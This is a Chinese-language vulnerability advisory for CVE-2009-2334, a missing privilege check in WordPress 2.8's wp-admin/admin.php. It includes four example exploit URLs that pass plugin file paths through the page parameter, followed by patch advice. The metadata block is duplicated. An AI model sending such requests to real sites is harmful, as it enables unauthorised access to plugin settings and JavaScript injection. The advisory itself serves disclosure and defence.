WordPress wp-admin/admin.php模块错误权限检查漏洞
添加时间:
2009-07-14
系统编号:
WAVDB-01468
BugCVE: CVE-2009-2334
BUGTRAQ: 35584
影响版本:
WordPress 2.8/WordPress MU 2.7.1
程序介绍:
2009-07-14
系统编号:
WAVDB-01468
BugCVE: CVE-2009-2334
BUGTRAQ: 35584
影响版本:
WordPress 2.8/WordPress MU 2.7.1
程序介绍:
WordPress是一款免费的论坛Blog系统。
漏洞分析:
WordPress对使用page参数的插件配置PHP模块缺少权限检查,如果非特权用户在请求中用admin.php替换了options-general.php或plugins.php,就可以非授权查看插件配置页面的内容,或修改某些插件选项并注入JavaScript代码。
漏洞利用:
http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php
解决方案:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/
信息来源:
<*来源:Fernando Arnaboldi
链接:http://marc.info/?l=bugtraq&m=124709299823452&w=2
*>